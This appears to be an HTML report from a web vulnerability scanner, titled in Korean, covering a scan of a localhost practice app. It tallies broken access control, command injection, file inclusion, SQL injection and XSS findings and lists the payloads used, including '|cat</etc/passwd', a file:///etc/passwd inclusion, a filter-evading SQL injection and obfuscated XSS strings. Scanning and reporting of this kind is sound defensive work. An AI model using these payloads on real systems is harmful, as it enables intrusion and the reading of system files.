
    <html>
    <head>
        <style>
            @import url('https://fonts.googleapis.com/css2?family=Montserrat:wght@400;700&display=swap');

            body {
                font-family: 'Montserrat', sans-serif;
                line-height: 1.5;
                color: #333333;
                background-color: #f9f9f9;
                padding: 30px;
                margin: 0;
            }

            h1 {
                font-size: 28px;
                text-align: center;
                margin-bottom: 30px;
            }

            .chart-container {
                display: flex;
                justify-content: center;
                margin-bottom: 30px;
            }

            .chart-container img {
                max-width: 100%;
                height: auto;
            }

            .container {
                margin-bottom: 30px;
            }

            table {
                border-collapse: collapse;
                width: 100%;
                margin-bottom: 20px;
                table-layout: auto;
            }

            th,
            td {
                padding: 10px 15px;
                border: 1px solid #e0e0e0;
                word-wrap: break-word;
            }

            th {
                background-color: #f5f5f5;
                font-weight: bold;
            }

            .payload-box {
                display: flex;
                flex-wrap: wrap;
                margin-top: 10px;
            }

            .payload-item {
                margin-bottom: 3px;
            }

            .payload-key {
                font-weight: bold;
            }

            .payload-value {
                margin-left: 3px;
            }
        </style>
    </head>

    <body>
        <h1>웹 취약점 스캐너 레포트</h1>

        <div class="chart-container">
            <img src="vulnerability_chart.png" alt="Vulnerability Chart">
        </div>

        <div class="container">
            <table>
        <tr>
            <th>Vulnerability</th>
            <th>Count</th>
        </tr>
    <tr><td>Broken Access Control</td><td>7</td></tr><tr><td>Command Injection</td><td>1</td></tr><tr><td>Local File Inclusion</td><td>1</td></tr><tr><td>SQL Injection</td><td>1</td></tr><tr><td>Cross-site scripting</td><td>3</td></tr></table>
        </div>

        <div class="container">
            <table>
        <tr>
            <th style="width: 200px; max-width: 200px;">Vulnerability</th>
            <th>URL</th>
            <th style="width: 100px; max-width: 120px;">Method</th>
            <th>Payload</th>
        </tr>
    
            <tr>
                <td>Broken Access Control</td>
                <td>http://localhost/setup.php</td>
                <td></td>
                <td></td>
            </tr>
        
            <tr>
                <td>Broken Access Control</td>
                <td>http://localhost/phpinfo.php</td>
                <td></td>
                <td></td>
            </tr>
        
            <tr>
                <td>Broken Access Control</td>
                <td>http://localhost/login.php</td>
                <td></td>
                <td></td>
            </tr>
        
            <tr>
                <td>Broken Access Control</td>
                <td>http://localhost/index.php</td>
                <td></td>
                <td></td>
            </tr>
        
            <tr>
                <td>Broken Access Control</td>
                <td>http://localhost/php.ini</td>
                <td></td>
                <td></td>
            </tr>
        
            <tr>
                <td>Broken Access Control</td>
                <td>http://localhost/security.php</td>
                <td></td>
                <td></td>
            </tr>
        
            <tr>
                <td>Broken Access Control</td>
                <td>http://localhost/about.php</td>
                <td></td>
                <td></td>
            </tr>
        
            <tr>
                <td>Command Injection</td>
                <td>http://localhost/vulnerabilities/exec/</td>
                <td>post</td>
                <td><div class='payload-box'><div class='payload-item'><span class='payload-key'>ip:</span> <span class='payload-value'>|cat&lt;/etc/passwd
</span></div><br></div></td>
            </tr>
        
            <tr>
                <td>Local File Inclusion</td>
                <td>http://localhost/vulnerabilities/fi/?page=</td>
                <td>get</td>
                <td>http://localhost/vulnerabilities/fi/?page=file:///etc/passwd</td>
            </tr>
        
            <tr>
                <td>SQL Injection</td>
                <td>http://localhost/vulnerabilities/sqli/session-input.php</td>
                <td>post</td>
                <td><div class='payload-box'><div class='payload-item'><span class='payload-key'>id:</span> <span class='payload-value'>1&#x27;/**/union select 1, hex(&quot;fu&quot; &quot;&quot; &quot;zz&quot;)-- xx
</span></div><br><div class='payload-item'><span class='payload-key'>Submit:</span> <span class='payload-value'>Submit
</span></div><br></div></td>
            </tr>
        
            <tr>
                <td>Cross-site scripting</td>
                <td>http://localhost/vulnerabilities/sqli/session-input.php</td>
                <td>post</td>
                <td><div class='payload-box'><div class='payload-item'><span class='payload-key'>id:</span> <span class='payload-value'>&lt;iframe src=&quot;javascript:Boolean[atob(&#x27;Y29uc3RydWN0b3I&#x27;)](atob(&#x27;YWxlcnQoNjc3Nzcp&#x27;))()&quot;/&gt;click
</span></div><br><div class='payload-item'><span class='payload-key'>Submit:</span> <span class='payload-value'>&lt;iframe src=&quot;javascript:Boolean[atob(&#x27;Y29uc3RydWN0b3I&#x27;)](atob(&#x27;YWxlcnQoNjc3Nzcp&#x27;))()&quot;/&gt;click
</span></div><br></div></td>
            </tr>
        
            <tr>
                <td>Cross-site scripting</td>
                <td>http://localhost/vulnerabilities/xss_r/</td>
                <td>get</td>
                <td><div class='payload-box'><div class='payload-item'><span class='payload-key'>name:</span> <span class='payload-value'>&lt;embed type=&quot;text/html&quot; data=&quot;#&quot; onload=&quot;alert(67777)&quot;&gt;
</span></div><br></div></td>
            </tr>
        
            <tr>
                <td>Cross-site scripting</td>
                <td>http://localhost/vulnerabilities/xss_s/</td>
                <td>post</td>
                <td><div class='payload-box'><div class='payload-item'><span class='payload-key'>txtName:</span> <span class='payload-value'>document.body.innerHTML+=&quot;&lt;a href=&quot;#&quot;  id=&quot;fuzz&quot; onmousedown=&quot;\u{61}lert`67777`&quot;&gt;click&quot;;
</span></div><br><div class='payload-item'><span class='payload-key'>btnSign:</span> <span class='payload-value'>document.body.innerHTML+=&quot;&lt;a href=&quot;#&quot;  id=&quot;fuzz&quot; onmousedown=&quot;\u{61}lert`67777`&quot;&gt;click&quot;;
</span></div><br><div class='payload-item'><span class='payload-key'>btnClear:</span> <span class='payload-value'>document.body.innerHTML+=&quot;&lt;a href=&quot;#&quot;  id=&quot;fuzz&quot; onmousedown=&quot;\u{61}lert`67777`&quot;&gt;click&quot;;
</span></div><br></div></td>
            </tr>
        </table>
        </div>
    </body>

    </html>
    